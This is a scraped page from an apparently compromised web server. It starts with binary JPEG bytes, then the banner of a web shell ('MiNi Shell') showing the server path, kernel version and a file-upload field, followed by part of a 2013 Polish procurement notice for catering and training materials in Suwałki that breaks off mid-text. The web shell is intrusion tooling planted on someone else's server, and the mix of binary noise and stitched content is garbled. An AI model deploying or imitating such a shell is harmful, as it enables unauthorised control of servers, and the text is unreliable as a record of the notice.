JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/516252-N-2013.html

<p class="kh_header"><b>Suwałki: usługi żywienia podczas szkoleń oraz usługę opracowania wzorników i dostawę materiałów szkoleniowych na potrzeby projektu pt.:  STARTER 2 nr WND-POKL.06.02.00-20-130-13.</b><br>
<b>Numer ogłoszenia: 516252 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach , ul. Teofila Noniewicza 42A, 16-400 Suwałki, woj. podlaskie, tel. 87 5666106, faks 87 5667497.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ares.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi żywienia podczas szkoleń oraz usługę opracowania wzorników i dostawę materiałów szkoleniowych na potrzeby projektu pt.:  STARTER 2 nr WND-POKL.06.02.00-20-130-13..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi żywienia podczas szkoleń oraz usługę opracowania wzorników i dostawę materiałów szkoleniowych na potrzeby projektu pt.:  STARTER 2 nr WND-POKL.06.02.00-20-130-13.Zadanie 1:  I GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13. Zadanie 2: II GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13.Zadanie 3: III GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13.Zadanie 4: IV GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13.Zadanie 5: Usługa opracowania wzorników i dostawa 240 kompletów materiałów szkoleniowych dla uczestników projektu w ramach doradztwa indywidualnego w projekcie pt.:  STARTER 2 nr WND-POKL.06.02.00-20-130-13.Zadanie 6: Usługa opracowania wzorników i dostawa 100 kompletów materiałów szkoleniowych dla uczestników szkolenia Mój biznes w ramach projektu pt.: STARTER 2 nr WND-POKL.06.02.00-20-130-13..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9, 30.19.20.00-1, 30.19.00.00-7, 79.82.25.00-7, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekty umów stanowią załącznik o nr 5.1. do SIWZ oraz załącznik o nr 5.2. do SIWZ  i są integralną częścią niniejszej dokumentacji i zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia.
2.	Stosownie do art. 144 ustawy, Zamawiający zastrzega sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającej na:
ZADANIE 1, 2, 3, 4: a)zmianie osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,b)sprostowania oczywistych omyłek pisarskich i rachunkowych,c)zmianie liczebności uczestników na mniejszą (w przypadku nie podjęcia kursu przez osobę skierowaną na kurs, rezygnacji kandydata/tki z kursu mimo wcześniejszych deklaracji uczestnictwa w kursie lub niestawienia się kandydata/tki na kursie pomimo wezwania Zamawiającego), d)zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy, w przypadku wystąpienia zdarzeń losowych.
Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. 
Ponadto  Zamawiający przewiduje możliwość zmiany umowy w przypadku:- gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy; - gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy;- zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 
ZADANIE 5, 6: a) zmianie osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,b)sprostowania oczywistych omyłek pisarskich i rachunkowych,Ponadto  Zamawiający przewiduje możliwość zmiany umowy w przypadku:
- gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy; 
- gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy;- zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ares.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach, ul. T. Noniewicza 42 a, 16-400 Suwałki, godziny urzędowania od 7:00-15.00 od poniedziałku do piątku.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 08:00, miejsce: Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach, ul. T. Noniewicza 42 a, 16-400 Suwałki, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> STARTER 2 nr WND-POKL.06.02.00-20-130-13.Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wdrożony i realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, w ramach  Priorytetu VI. Rynek pracy otwarty dla wszystkich, Działanie 6.2. Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.2.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2014 r.), w ramach organizowanego szkolenia.3.W ramach zamówienia Wykonawca zobowiązany jest do:
a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,
b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia; Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:- szacunkowa liczebność grupy szkoleniowej: 25 osób,- łączna liczba dni szkoleniowych: 4 dni,- szacunkowa ilość zestawów: 100 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8)
- miejsce świadczenia usługi:  Suwałki-Augustów.5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata-tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata-tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:a) przerwy kawowej  23% VAT;b) lunchu  8% VAT.7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a) 1 filiżanki kawy rozpuszczalnej 250 ml;b) 1 filiżanki herbaty czarnej 250 ml;c) Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);
d) Cukier biały 20g, e) Cytryna (pokrojona, podawana na talerzykach) 1plaster, f) Mleko 30 ml , g) Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8.	W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1.Karkówka po myśliwsku 120g-os, Ziemniaki  200g-os, Surówka z białej kapusty 150g-os, Napój owocowy 300ml-os.2.Zrazy wieprzowe 200g-os,Ziemniaki 200g-os, Buraczki na ciepło 150g-os, Napój owocowy 300ml-os 3.Roladki drobiowe z farszem mięsnym 200g-os.Ziemniaki 200g-os.Jarzynka z marchewki z groszkiem na maśle 150g-os.Napój owocowy 300ml-os.4.Pieczeń wieprzowa w sosie korzennym 200 g-os. Ziemniaki 200g-os.Surówka z kapusty pekińskiej, pora, papryki 150 g-os.Napój owocowy 300 ml-os.9.Dania winny być podawane na gorąco.10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za realizację usługi  podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-13013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2014 r.), w ramach organizowanego szkolenia.3.W ramach zamówienia Wykonawca zobowiązany jest do:a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia; Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,
f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:- szacunkowa liczebność grupy szkoleniowej: 25 osób,- łączna liczba dni szkoleniowych: 4 dni,- szacunkowa ilość zestawów: 100 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8)- miejsce świadczenia usługi:  Suwałki-Augustów.5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata/tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata-tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:a)przerwy kawowej  23% VAT;b)lunchu  8% VAT.7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a)1 filiżanki kawy rozpuszczalnej 250 ml;b)1 filiżanki herbaty czarnej 250 ml;c)Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d)Cukier biały 20g, e)Cytryna (pokrojona, podawana na talerzykach) 1plaster, f)Mleko 30 ml 
g)Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1.Karkówka po myśliwsku 120g-os ,Ziemniaki  200g-os, Surówka z białej kapusty 150g-os, Napój owocowy 300ml-os2.Zrazy wieprzowe 200g-os, Ziemniaki 200g-os, Buraczki na ciepło 150g-os, Napój owocowy 300ml-os.3.Roladki drobiowe z farszem mięsnym 200g-os.Ziemniaki 200g-os.Jarzynka z marchewki z groszkiem na maśle 150g-os. Napój owocowy 300ml-os.4.Pieczeń wieprzowa w sosie korzennym 200 g-os.Ziemniaki 200g-os.Surówka z kapusty pekińskiej, pora, papryki 150 g-os. Napój owocowy 300 ml-os.9.Dania winny być podawane na gorąco.10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za realizację usługi  podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.2.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2014 r.), w ramach organizowanego szkolenia.3.W ramach zamówienia Wykonawca zobowiązany jest do:a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 